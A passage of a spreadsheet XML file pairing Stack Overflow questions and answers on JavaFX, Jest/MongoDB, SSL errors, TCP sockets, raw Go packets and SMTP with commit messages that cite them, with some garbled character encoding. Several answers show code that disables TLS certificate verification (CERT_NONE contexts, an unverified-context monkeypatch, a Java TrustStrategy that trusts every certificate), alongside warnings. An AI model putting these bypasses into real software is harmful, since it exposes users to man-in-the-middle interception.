 and i am getting syntax error on line  `sd.setContent(Source.sourceFor("","Customeradd.fxml"));` and `tabpanel` is my `TabPane`.
Error Look Like
 ![enter image description here][1]
Help Me please
  [1]: https://i.sstatic.net/ZZEKq.png
Assuming you have a FXML at the same directory as the class where you will load it from, you should do something like this (if your FXML defines a TabPane):
 TabPane pane = FXMLLoader.load(this.getClass().getResource("SomeWidget.fxml"));
Now, suppose you have a nice Tab in a MyTab.fxml file:
pane.getTabs().addAll((Tab)FXMLLoader.load(this.getClass().getResource("MyTab.fxml")));
Really easy!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this problem when running &lt;code&gt;npm test&lt;/code&gt; through jest.
The application is the backend of the MongoDB database.
It runs normally, but the only test fails.&lt;/p&gt;
&lt;h3&gt;Error&lt;/h3&gt;
&lt;pre class="lang-bash prettyprint-override"&gt;&lt;code&gt;npm test
&amp;gt; crypto-api@1.0.0 test
&amp;gt; jest
(node:7280) [MONGODB DRIVER] Warning: useNewUrlParser is a deprecated option: useNewUrlParser has no effect since Node.js Driver version 4.0.0 and will be removed in the next major version`
(Use node --trace-warnings ... to show where the warning was created)`
(node:7280) [MONGODB DRIVER] Warning: useUnifiedTopology is a deprecated option: useUnifiedTopology
has no effect since Node.js Driver version 4.0.0 and will be removed in the next major version
console.log
âœ… MongoDB Conectado: aula-shard-00-00.7obon.mongodb.net
      at log (src/db.js:9:13)
console.log
Resposta do login: { message: 'UsuÃ¡rio nÃ£o encontrado' }
      at Object.log (src/tests/user.test.js:30:13)
console.log
Token recebido: undefined
      at Object.log (src/tests/user.test.js:33:13)
console.log
Resposta ao criar usuÃ¡rio: {
message: 'Erro ao criar usuÃ¡rio',
error: {
errors: { name: [Object], password: [Object] },
_message: 'User validation failed',
name: 'ValidationError',
message: 'User validation failed: name: Path name is required., password: Path password
is required.'
}
}
      at Object.log (src/tests/user.test.js:49:13)
FAIL  src/tests/user.test.js (5.537 s)
Testes da API de UsuÃ¡rios
Ã— Deve criar um usuÃ¡rio (220 ms)
Ã— Deve buscar usuÃ¡rios (106 ms)
Ã— Deve criar um usuÃ¡rio (88 ms)
â— Testes da API de UsuÃ¡rios â€º Deve criar um usuÃ¡rio
    expect(received).toBe(expected) // Object.is equality
    Expected: 201
    Received: 500
      18 |       senha: &amp;quot;senha123&amp;quot;,
      19 |     });
    &amp;gt; 20 |     expect(res.statusCode).toBe(201);
         |                            ^
      21 |     expect(res.body).toHaveProperty(&amp;quot;token&amp;quot;);
      22 |   });
      23 |
      at Object.toBe (src/tests/user.test.js:20:28)
â— Testes da API de UsuÃ¡rios â€º Deve buscar usuÃ¡rios
    expect(received).toBe(expected) // Object.is equality
    Expected: 200
    Received: 401
      37 |       .set(&amp;quot;Authorization&amp;quot;, `Bearer ${token}`);
      38 |
    &amp;gt; 39 |     expect(res.statusCode).toBe(200);
         |                            ^
      40 |     expect(Array.isArray(res.body)).toBeTruthy();
      41 |   });
      42 |   it(&amp;quot;Deve criar um usuÃ¡rio&amp;quot;, async () =&amp;gt; {
      at Object.toBe (src/tests/user.test.js:39:28)
â— Testes da API de UsuÃ¡rios â€º Deve criar um usuÃ¡rio
    expect(received).toBe(expected) // Object.is equality
    Expected: 201
    Received: 500
      49 |     console.log(&amp;quot;Resposta ao criar usuÃ¡rio:&amp;quot;, res.body); // ðŸ” Debugando o erro
      50 |
    &amp;gt; 51 |     expect(res.statusCode).toBe(201);
         |                            ^
      52 |     expect(res.body).toHaveProperty(&amp;quot;token&amp;quot;);
      53 |   });
      54 |
      at Object.toBe (src/tests/user.test.js:51:28)
Test Suites: 1 failed, 1 total
Tests:       3 failed, 3 total
Snapshots:   0 total
Time:        5.773 s
Ran all test suites.
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;My Code:&lt;/h2&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;db.js
const mongoose = require('mongoose');
const connectDB = async () =&amp;gt; {
  try {
    const conn = await mongoose.connect(process.env.MONGO_URI, {
      useNewUrlParser: true,
      useUnifiedTopology: true
    });
    console.log(`âœ… MongoDB Conectado: ${conn.connection.host}`);
  } catch (error) {
    console.error(`âŒ Erro ao conectar ao MongoDB: ${error.message}`);
    process.exit(1); // Encerra a aplicaÃ§Ã£o se houver erro
  }
};
module.exports = connectDB;
&lt;/code&gt;&lt;/pre&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;user.test.js
const request = require(&amp;quot;supertest&amp;quot;);
const app = require(&amp;quot;../server&amp;quot;); // Agora usamos o app sem iniciar um novo servidor
const mongoose = require(&amp;quot;mongoose&amp;quot;);
beforeAll(async () =&amp;gt; {
  await mongoose.connection.dropDatabase(); // Limpa o banco antes dos testes
});
afterAll(async () =&amp;gt; {
  await mongoose.connection.close(); // Fecha a conexÃ£o apÃ³s os testes
});
describe(&amp;quot;Testes da API de UsuÃ¡rios&amp;quot;, () =&amp;gt; {
  it(&amp;quot;Deve criar um usuÃ¡rio&amp;quot;, async () =&amp;gt; {
    const res = await request(app).post(&amp;quot;/api/users&amp;quot;).send({
      nome: &amp;quot;Teste UsuÃ¡rio&amp;quot;,
      email: &amp;quot;teste@example.com&amp;quot;,
      senha: &amp;quot;senha123&amp;quot;,
    });
    expect(res.statusCode).toBe(201);
    expect(res.body).toHaveProperty(&amp;quot;token&amp;quot;);
  });
  it(&amp;quot;Deve buscar usuÃ¡rios&amp;quot;, async () =&amp;gt; {
    const loginRes = await request(app).post(&amp;quot;/api/auth/login&amp;quot;).send({
      email: &amp;quot;teste@example.com&amp;quot;,
      senha: &amp;quot;senha123&amp;quot;,
    });
    console.log(&amp;quot;Resposta do login:&amp;quot;, loginRes.body); // ðŸ” Verificando login
    const token = loginRes.body.token;
    console.log(&amp;quot;Token recebido:&amp;quot;, token); // ðŸ‘€ Verificando se o token estÃ¡ vindo corretamente
    const res = await request(app)
      .get(&amp;quot;/api/users&amp;quot;)
      .set(&amp;quot;Authorization&amp;quot;, `Bearer ${token}`);
    expect(res.statusCode).toBe(200);
    expect(Array.isArray(res.body)).toBeTruthy();
  });
  it(&amp;quot;Deve criar um usuÃ¡rio&amp;quot;, async () =&amp;gt; {
    const res = await request(app).post(&amp;quot;/api/users&amp;quot;).send({
      nome: &amp;quot;Teste UsuÃ¡rio&amp;quot;,
      email: &amp;quot;teste@example.com&amp;quot;,
      senha: &amp;quot;senha123&amp;quot;,
    });
    console.log(&amp;quot;Resposta ao criar usuÃ¡rio:&amp;quot;, res.body); // ðŸ” Debugando o erro
    expect(res.statusCode).toBe(201);
    expect(res.body).toHaveProperty(&amp;quot;token&amp;quot;);
  });
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried a few things, but I didn't succeed, if anyone can shed some light!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C590</t>
  </si>
  <si>
    <t>fixed error handling and added ssl certificate
- Apparently, URLError doesn't have any `code` attribute, HTTPError has. Fixed it.
- Another bug: urllib was complaining `SSL: CERTIFICATE_VERIFY_FAILED` when calling `urlopen()`. Included a `SSLContext` to prevent that(Refer: https://stackoverflow.com/a/28052583/6528908).
- Print statement will be useless when Zabbix will execute the file. Added logs.</t>
  </si>
  <si>
    <t>If you just want to bypass verification, you can create a new SSLContext. By default newly created contexts use CERT_NONE.
Be careful with this as stated in section 17.3.7.2.1
When calling the SSLContext constructor directly, CERT_NONE is the default. Since it does not authenticate the other peer, it can be insecure, especially in client mode where most of time you would like to ensure the authenticity of the server you’re talking to. Therefore, when in client mode, it is highly recommended to use CERT_REQUIRED.
But if you just want it to work now for some other reason you can do the following, you'll have to import ssl as well:
input = input.replace("!web ", "")      
url = "https://domainsearch.p.mashape.com/index.php?name=" + input
req = urllib2.Request(url, headers={ 'X-Mashape-Key': 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' })
gcontext = ssl.SSLContext()  # Only for gangstars
info = urllib2.urlopen(req, context=gcontext).read()
Message.Chat.SendMessage ("" + info)
This should get round your problem but you're not really solving any of the issues, but you won't see the [SSL: CERTIFICATE_VERIFY_FAILED] because you now aren't verifying the cert!
To add to the above, if you want to know more about why you are seeing these issues you will want to have a look at PEP 476.
This PEP proposes to enable verification of X509 certificate signatures, as well as hostname verification for Python's HTTP clients by default, subject to opt-out on a per-call basis. This change would be applied to Python 2.7, Python 3.4, and Python 3.5.
There is an advised opt out which isn't dissimilar to my advice above:
import ssl
# This restores the same behavior as before.
context = ssl._create_unverified_context()
urllib.urlopen("https://no-valid-cert", context=context)
It also features a highly discouraged option via monkeypatching which you don't often see in python:
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
Which overrides the default function for context creation with the function to create an unverified context.
Please note with this as stated in the PEP:
This guidance is aimed primarily at system administrators that wish to adopt newer versions of Python that implement this PEP in legacy environments that do not yet support certificate verification on HTTPS connections. For example, an administrator may opt out by adding the monkeypatch above to sitecustomize.py in their Standard Operating Environment for Python. Applications and libraries SHOULD NOT be making this change process wide (except perhaps in response to a system administrator controlled configuration setting).
If you want to read a paper on why not validating certs is bad in software you can find it here!</t>
  </si>
  <si>
    <t xml:space="preserve">I was just wondering who knows what programming languages Windows, Mac OS X and Linux are made up from and what languages are used for each part of the OS (ie: Kernel, plug-in architecture, GUI components, etc).
I assume that there are multiple languages for each and obviously I know the Linux kernel is written in C.
I'm totally guessing here that Mac OS X contains a lot of Objective-C code as it is Apple's language derived from NeXT.
Windows, I have heard contains C, C++ and Intel Assembly. Do Linux or Mac OS contain any Assembly code?
Also, are there scripting languages like Ruby, Python, etc used by the OS developers for scripting parts of the OS? What parts of the OS would be written in each language?
</t>
  </si>
  <si>
    <t>C591</t>
  </si>
  <si>
    <t>Issue #13. Checking ignore unverified SSL certificates now pushes to 
Stash.
Previously would still throw SSLPeerUnveritifiedException even when checked
so replaced SSLContext and UnsafeX509TrustManager with TrustStrategy as advised on
the following StackOverflow link:
http://stackoverflow.com/questions/9101763/sslpeerunverifiedexception-with-httpclient</t>
  </si>
  <si>
    <t>The trust manager instance created by your code does not seem to be used anywhere, and the KeyStore instance does not seem to contain any trust material.
Instead of doing all that you should simply leverage functionality of
SSLSocketFactory
.
TrustStrategy easyStrategy = new TrustStrategy() {
    public boolean isTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        // eh, why not?
        return true;
    }
};
SSLSocketFactory sf = new SSLSocketFactory(easyStrategy);</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a math website with articles that forms a Tree structure. So I have a directory &lt;code&gt;Geometry&lt;/code&gt; and inside of it I have another one &lt;code&gt;planimetry&lt;/code&gt;, then &lt;code&gt;triangles&lt;/code&gt; and finally &lt;code&gt;pythagorean-theorem&lt;/code&gt; (each subfolder is also a separate article so its not only grouping element).&lt;/p&gt;
&lt;p&gt;The thing is that currently I simply have a short url like: &lt;code&gt;my-webiste.com/pythagorean-theorem&lt;/code&gt; and I'm wondering how big impact on SEO will have a change of that URL to &lt;code&gt;my-website.com/geometry/planimetry/triangles/pythagorean-theorem&lt;/code&gt; ? Nextjs allow that but it will be harder to maintain such a structure and if I rename any of subfolders then the entire path will be incorrect. Simialrly, when I move &lt;code&gt;pythagorean-theorem&lt;/code&gt; node somewhere else. Any suggestions? Is it worth to do that? Even wikipedia does not have such a deep structure and their url is simply &lt;code&gt;/wiki/Pythagorean_theorem&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C592</t>
  </si>
  <si>
    <t>use port 443 for ssl and the proper headers
https://stackoverflow.com/a/61593945
Was getting 433 errors in the browser and web logs:
web_1       | [793783cc-d5c6-4e99-b70d-d9957b7e9170] ActionController::InvalidAuthenticityToken (ActionController::InvalidAuthenticityToken):
web_1       | [793783cc-d5c6-4e99-b70d-d9957b7e9170]
web_1       | [793783cc-d5c6-4e99-b70d-d9957b7e9170] omniauth-rails_csrf_protection (0.1.2) lib/omniauth/rails_csrf_protection/token_verifier.rb:34:in `call'</t>
  </si>
  <si>
    <t>Try to fix by adding more headers
X-Forwarded-Ssl on
,
X-Forwarded-Port 443
,
X-Forwarded-Host "your hostname"
,
X-Forwarded-Proto https
.
CSRF tokens are checked by ActionController (
compares the
request.base_url
with the origin header
)</t>
  </si>
  <si>
    <t xml:space="preserve">I'm working on a .net portal which would be having lots of concurrent users.
so scalability,performance need to be addressed in the design and architecture.
We plan to use load balancing in the application.
Keeping this in mind,what would be the best way of communicating between IIS web server(hosting aspx,aspx.cs files) and application server (hosting  .net assemblies like business logic and data access layer)?
Should it be .net remoting or soap web service?or is there any other approach?
Thanks.
</t>
  </si>
  <si>
    <t>C593</t>
  </si>
  <si>
    <t>Tell Ruby openssl to trust server certificate
This makes it un-necessary to put the certificate file in the OpenSSL
system directory and execute `c_rehash` in order to avoid
"OpenSSL::SSL::SSLError: SSL_read:: sslv3 alert bad record mac" errors
showing up in the logs when running locally. The error was generally
associated with failing to load JS or CSS files which can be
disconcerting.
This solution came from StackOverflow at
http://stackoverflow.com/questions/14748701/how-to-set-ca-bundle-path-for-openssl-in-ruby</t>
  </si>
  <si>
    <t>OpenSSL uses the
SSL_CERT_FILE
environment variable. You can set it in your ruby script using something like before the first
require
which pulls in OpenSSL:
ENV['SSL_CERT_FILE'] = '/path/to/ca-bundle.pem'
or, if you prefer, you can set the
SSL_CERT_FILE
environment variable in your OS environment, web server configuration etc depending on your situation.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing eBPF programming. Sometimes I cannot get the program name using &lt;code&gt;execve&lt;/code&gt;, but I can use &lt;code&gt;execv&lt;/code&gt; and &lt;code&gt;syscall (SYS_execve,...)&lt;/code&gt;. The specific code is as follows:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;ebpf code&lt;/li&gt;
&lt;/ol&gt;
&lt;pre class="lang-c prettyprint-override"&gt;&lt;code&gt;static u32 ebpf_getppid(void)
{
    struct task_struct *task = (struct task_struct *)bpf_get_current_task();
    struct task_struct *parent = (struct task_struct *)BPF_CORE_READ(task, real_parent);
    return BPF_CORE_READ(parent, tgid);
}
SEC(&amp;quot;tp/syscalls/sys_enter_execve&amp;quot;)
int tracepoint__syscalls__sys_enter_execve(struct trace_event_raw_sys_enter *ctx)
{
    struct epm_command command = {};
    const char *filename = (const char *)BPF_CORE_READ(ctx, args[0]);
    const unsigned long *argv_ptr = (const unsigned long *)BPF_CORE_READ(ctx, args[1]);
    const unsigned long *envp_ptr = (const unsigned long *)BPF_CORE_READ(ctx, args[2]);
    char temp[128] = {0};
    for(int i = 0; i &amp;lt; 4; i++){
        bpf_printk(&amp;quot;args[%d]: 0x%lx\n&amp;quot;, i, BPF_CORE_READ(ctx, args[i]));
    }
    command.process_id = ebpf_getppid();
    command.timestamp = bpf_ktime_get_ns();
    bpf_get_current_comm(&amp;amp;command.process_name, sizeof(command.process_name));
    bpf_probe_read_str(&amp;amp;command.call_prog_name, sizeof(command.call_prog_name), filename);
    bpf_printk(&amp;quot;Parent Process name: %s\n&amp;quot;, command.process_name);
    bpf_printk(&amp;quot;Call Process name: %s\n&amp;quot;, command.call_prog_name);
    for(int i = 0; i &amp;lt; 64; i++) {
        unsigned long arg_ptr = 0;
        __builtin_memset(temp, 0, sizeof(temp));
        bpf_probe_read_str(&amp;amp;arg_ptr, sizeof(arg_ptr), &amp;amp;argv_ptr[i]);
        if(arg_ptr == 0) {
            break;
        }
        bpf_probe_read_str(temp, sizeof(temp), (void *)arg_ptr);
        bpf_printk(&amp;quot;argv[%d]: %s\n&amp;quot;, i, temp);
    }
    for(int i = 0; i &amp;lt; 64; i++) {
        unsigned long env_ptr = 0;
        __builtin_memset(temp, 0, sizeof(temp));
        bpf_probe_read_str(&amp;amp;env_ptr, sizeof(env_ptr), &amp;amp;envp_ptr[i]);
        if(env_ptr == 0) {
            break;
        }
        bpf_probe_read_str(temp, sizeof(temp), (void *)env_ptr);
        bpf_printk(&amp;quot;envp[%d]: %s\n&amp;quot;, i, temp);
    }
    bpf_map_update_elem(&amp;amp;epm_execve_map, &amp;amp;command.process_id, &amp;amp;command, BPF_ANY);
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start="2"&gt;
&lt;li&gt;User-level code that cannot get the program name&lt;/li&gt;
&lt;/ol&gt;
&lt;pre class="lang-c prettyprint-override"&gt;&lt;code&gt;int main() {
    char *args[] = {&amp;quot;/usr/bin/ls&amp;quot;, &amp;quot;-l&amp;quot;, NULL, NULL};
    char *envp[] = {NULL};
    execve(&amp;quot;/usr/bin/ls&amp;quot;, args, envp);
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start="3"&gt;
&lt;li&gt;User-level code that can get the program name&lt;/li&gt;
&lt;/ol&gt;
&lt;pre class="lang-c prettyprint-override"&gt;&lt;code&gt;int main() {
    char *args[] = {&amp;quot;/usr/bin/ls&amp;quot;, &amp;quot;-l&amp;quot;, NULL, NULL};
    char *envp[] = {NULL};
    printf(&amp;quot;args addr: %p\n&amp;quot;, args);
    printf(&amp;quot;envp addr: %p\n&amp;quot;, envp);
    execve(&amp;quot;/usr/bin/ls&amp;quot;, args, envp);
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The difference between the two application-level codes is that &lt;code&gt;printf&lt;/code&gt; is added to print &lt;code&gt;args&lt;/code&gt; and &lt;code&gt;envp&lt;/code&gt;. I would like to ask what is the specific reason for this?&lt;/p&gt;
&lt;p&gt;I hope to get the correct answer to the above-described question&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C594</t>
  </si>
  <si>
    <t>Add certificate pinning; switch to https
Downloading was still being done on HttpURLConnection instead of HttpsURLConnection.  The connect probably still occured at https. Read @ http://stackoverflow.com/questions/9960998/using-httpurlconnection-and-httpsurlconnection-to-connect-to-an-https
Otherwise, attempting to use ssl pinning library for downloading/version updates.
Signed-off-by: binkybear &lt;binkybear@nethunter.com&gt;</t>
  </si>
  <si>
    <t>HTTPS connection being used.
Default Behaviors
Not sure but read below.
I just wrote some code as a test (see all the way below). What ends up happening is the
URL.openConnection()
call will give you back a
libcore.net.http.HttpsURLConnectionImpl
class.
This is an implementation of HttpsURLConnection but HttpsURLConnection inherits from HttpURLConnection. So you're seeing polymorphism at work.
Looking further into the debugger it appears that the class is using the default factory methods.
hostnameVerifier =
javax.net.ssl.DefaultHostnameVerifier
sslSocketFactory =
org.apache.harmony.xnet.provider.jsse.OpenSSLSocketFactoryImpl
Based on this it looks like the default behaviors are being used. I don't know if that means if you're trusting everything but you are definitely establishing an HTTPS connection.
The documentation kinda hints at the connection will auto-trust CAs that are well known but not self-signed. (see below) I did not test this but they have example code on
how to accomplish that here
.
If an application wants to trust Certificate Authority (CA)
  certificates that are not part of the system, it should specify its
  own X509TrustManager via a SSLSocketFactory set on the
  HttpsURLConnection.
Runnable r = new Runnable() {
    public void run() {
        try {
        URL test = new URL("https://www.google.com/");
        HttpURLConnection connection = (HttpURLConnection) test.openConnection();
        InputStream is = connection.getInputStream();
        StringWriter sw = new StringWriter();
        String value = new java.util.Scanner(is).useDelimiter("\\A").next();
        Log.w("GOOGLE", value);
        } catch(Exception e) {
            Log.e("Test", e.getMessage());
        }
    }
};
Thread t = new Thread(r);
t.start();</t>
  </si>
  <si>
    <t xml:space="preserve">How do patches or service packs work? I don't know how to explain my question but I will give a try
Take Windows for example. It has files which altogether consume 100s of MB. Now a single service pack (may be 300 MB file) updates the whole windows OS.
Similarly I have seen updates happening for softwares like adobe reader etc. In all these cases the main exe is much larger compared to the update. How does the process work? If the main file refers any dependancy files and if the update change the version or size. Will it not affect the exe? 
</t>
  </si>
  <si>
    <t>C595</t>
  </si>
  <si>
    <t>Implement TCP client
Communicatin with Java Server established using
https://stackoverflow.com/questions/4185242/communication-between-python-client-and-java-server</t>
  </si>
  <si>
    <t>ya..you need to add '\n' at the end of the string in python client..... here's an example... PythonTCPCLient.py
`
#!/usr/bin/env python
import socket
HOST = "localhost"
PORT = 8080
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
sock.sendall("Hello\n")
data = sock.recv(1024)
print "1)", data
if ( data == "olleH\n" ):
    sock.sendall("Bye\n")
    data = sock.recv(1024)
    print "2)", data
    if (data == "eyB}\n"):
        sock.close()
        print "Socket closed"
`
Now Here's the java Code: JavaServer.java `
 import java.io.*;
import java.net.*;
class JavaServer {
    public static void main(String args[]) throws Exception {
        String fromClient;
        String toClient;
        ServerSocket server = new ServerSocket(8080);
        System.out.println("wait for connection on port 8080");
        boolean run = true;
        while(run) {
            Socket client = server.accept();
            System.out.println("got connection on port 8080");
            BufferedReader in = new BufferedReader(new InputStreamReader(client.getInputStream()));
            PrintWriter out = new PrintWriter(client.getOutputStream(),true);
            fromClient = in.readLine();
            System.out.println("received: " + fromClient);
            if(fromClient.equals("Hello")) {
                toClient = "olleH";
                System.out.println("send olleH");
                out.println(toClient);
                fromClient = in.readLine();
                System.out.println("received: " + fromClient);
                if(fromClient.equals("Bye")) {
                    toClient = "eyB";
                    System.out.println("send eyB");
                    out.println(toClient);
                    client.close();
                    run = false;
                    System.out.println("socket closed");
                }
            }
        }
        System.exit(0);
    }
}
` Reference:Python TCP Client &amp; Java TCP Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a relationship that is structured like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Book {
    id: UUID
    author: Author
}
Author {
    id: UUID
    genre: Genre
}
Genre {
    id: UUID
    name: String
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to be able to query for books that have authors that have a specialize in a specific genre.&lt;/p&gt;
&lt;p&gt;I want to do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;let query = Book.query(on: db)
    .with(\.$author) { author in
        author.with(\Author.$genre)
    }
    .filter(\Book.$author.$genre.$name, .equal, &amp;quot;Mystery&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I am getting issues with accessing the genre field from the author.&lt;/p&gt;
&lt;p&gt;If I change it to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.filter(\Book.author.$genre.$name, .equal, &amp;quot;Mystery&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get an error where it says author wasn't eager loaded.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C596</t>
  </si>
  <si>
    <t>Properly send customized TCP/IP packets with payload.
Hurray for stackoverflow!
https://stackoverflow.com/questions/27218989/how-to-use-golang-to-compose-raw-tcp-packet-using-gopacket-and-send-it-via-raw/27224011#27224011
Must use this api to send out raw tcp/ip packets:</t>
  </si>
  <si>
    <t>You question says "craft custome[sic] TCP packets" but your code makes it clear you also want to craft custom IP layer 3 headers and there is a difference between the two. Also, you don't mention IPv4 vs IPv6, but again your code seems IPv4 specific.
Given your example code I'll assume you want to be set the full IPv4 header.
As of Go 1.3.3 and the soon to be released Go 1.4 you can't do what you want using the Core Go packages. To accomplish what you desire you need to do two things:
You need to create a raw socket in Go. Contrary to other incorrect answers on this website you can create a raw socket in Go using one of
net.ListenPacket
,
net.DialIP
, or
net.ListenIP
.
For example:
conn, err := net.ListenIP("ip4:tcp", netaddr)
if err != nil {
    log.Fatalf("ListenIP: %s\n", err)
}
creates a raw socket.
If you want to set your own IPv4 layer 3 header you will need to set a socket option to enable functionality.
Your question don't state what OS and architecture you are using. On my laptop running Mac OS X:
% man ip
. . .
Outgoing packets automatically have an IP header prepended to them
(based on the destination address and the protocol number the socket is created with),
unless the IP_HDRINCL option has been set.
IP_HDRINCL
is also available on Linux. Unfortunately, Core Go does not have a way to set the
IP_HDRINCL
socket option nor does it have a way to set other IP socket options such as
IP_TTL
. I have a set of private patches that enable this functionality with Core Go but that won't help you.
I believe the following package has all the functionality you desire
ipv4
. Please note it's a large package and I haven't used it myself. I did grep and it supports
IP_HDRINCL
on multiple platforms. You want to call
NewRawConn
to create a raw connection and this function creates a raw socket and sets the
IP_HDRINCL
socket option.
See also here:
raw-sockets-in-go
and the code he wrote here
latency
to get a feel for a much simpler approach that might suit your needs if you just want to set TCP headers. However, please note this code doesn't let you set the IP addresses in the IPv4 IP header which I suspect you want to do.</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently working on a small N-Tier application in C# which uses Linq-to-Entities (SQL Express 2005 for the DB) and WPF and I am wondering what type of data collection my business logic layer should be supplying to the user interface.
Are there downsides (performance, validation etc) to binding form objects like datagridviews to an IQueryable?  Should I populate an in-memory DataTable and pass that to the UI?  In which layer should the DataContext be initialized?  
</t>
  </si>
  <si>
    <t>C597</t>
  </si>
  <si>
    <t>TCP Async - Add Timeout Test
http://stackoverflow.com/questions/32614395/spring-integration-tcp-outbound-channel-adapter-that-detects-connection-loss-and/32617568#comment54590607_32617568</t>
  </si>
  <si>
    <t>See this commit (Add Reaper to Timeout Aggregation) to your test case. 1. Add a 20s timeout to the gateway so null will be returned when no response at all. 2. Add a reaper to the aggregator's message store and timeout the group after approximately 10 seconds (see the reaper docs for more information. When a group times out, return a MessageTimeoutException to the gateway.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using IBatis with DB2.&lt;/p&gt;
&lt;p&gt;I have a table and &lt;code&gt;content&lt;/code&gt; column is defined as &lt;code&gt;VARCHAR(2000)&lt;/code&gt; in the table.&lt;/p&gt;
&lt;p&gt;At first, I tried to insert data into the table with the following query&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT INTO TABLE
(...,
content,
...
)
VALUES
(...,
TRIM(#content:VARCHAR#),
...
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It gave a SQL302 error, even thought the data was only 400 bytes.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The value of a host variable in the EXECUTE or OPEN statement is too large for its corresponding use.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And then I found out that it worked well except for &lt;code&gt;trim()&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Why are these errors coming up?
Did I do some thing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C598</t>
  </si>
  <si>
    <t>Fix SSL security issue in the SMTP email relay code
The hostname of the SSL socket was not verified. This made the read
from the socket insecure since without verifying the hostname it may
be vulnerable to a man-in-the-middle attack as described in [1].
This issue was reported by Sam Blackshear and Jules Villard from the
Infer static analysis team at Facebook and it was detected by running
Infer [2] on the Gerrit code base.
As described in [3] Java 7 has a mechanism to verify the identity of
the certificate directly as part of the SSLSocket/SSLEngine API, and
with this change we make use of it to verify the hostname.
I discussed this with Shawn and we decided to develop this fix in open
source since the issue is in a non-critical part of Gerrit.
[1] https://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf
[2] http://fbinfer.com/
[3] http://stackoverflow.com/questions/17972658/sslsocket-ignores-domain-mismatch/17979954#17979954</t>
  </si>
  <si>
    <t xml:space="preserve">What are some of the disadvantages of using an external JS file over including the JS as a part of the ASPX page?
I need to make an architectural decision and heard from coworkers that external JS does not play nice sometimes.
</t>
  </si>
  <si>
    <t>C599</t>
  </si>
  <si>
    <t>SMTPServerDisconnected and last_msg null fixes
smtplib.SMTPServerDisconnected:
http://stackoverflow.com/questions/8964448/django-sending-lots-of-emails-smtp-connection-dropping</t>
  </si>
  <si>
    <t>OK -- I solved this situation. Really, it is more of a work around. I believe that Gmail is stopping my emails because they think it is spam. Sending hundreds of emails one after the other has triggered something on their end and closed my connection. That's my theory anyway.
My work around is adding a line of code to the
engine.py
file. After an email is sent successfully, I added the line
time.sleep(70)
. This causes the mailer to simply wait 70 seconds before continuing. I added this code and tried sending all my emails. After about 7 hours, over 400 emails were sent successfully. I would say that it works. It doesn't have to be fast, it just has to work. I wouldn't care if it took a few days -- so long as they are sent.
Thanks for the help.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using Konva (konva-react), i render line using this component:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;  const renderLine = (pathProps: CanvasPath | ActivePath, key?: number) =&amp;gt; (
    &amp;lt;Line
      key={key}
      points={pathProps.points}
      stroke={pathProps.tool === &amp;quot;eraser&amp;quot; ? ERASER_COLOR : STROKE_COLOR}
      strokeWidth={pathProps.strokeWidth}
      tension={0.5}
      lineCap=&amp;quot;round&amp;quot;
      globalCompositeOperation={
        pathProps.tool === &amp;quot;eraser&amp;quot; ? &amp;quot;destination-out&amp;quot; : &amp;quot;source-over&amp;quot;
      }
    /&amp;gt;
  );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and here's my mouseEvent:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;
const handleMouseMove = useCallback(
    (e: Konva.KonvaEventObject&amp;lt;MouseEvent | TouchEvent&amp;gt;) =&amp;gt; {
      if (!activePath?.isDrawing) return;
      const pos = e.target.getStage()?.getPointerPosition();
      if (!pos || !isPointInImage(pos.x, pos.y)) return;
      setActivePath({
        ...activePath,
        points: [...activePath.points, pos.x, pos.y],
      });
    },
    [activePath, isPointInImage]
  );
  const handleMouseUp = useCallback(() =&amp;gt; {
    if (!activePath) return;
    const newPath: CanvasPath = {
      tool: activePath.tool,
      points: activePath.points,
      strokeWidth: activePath.strokeWidth,
    };
    setPaths(newPaths);
    setActivePath(null);
  }, [activePath, paths]);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;nb: the set function is react state&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/TMtepugJ.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/TMtepugJ.png" alt="konva line" /&gt;&lt;/a&gt;&lt;/p&gt;
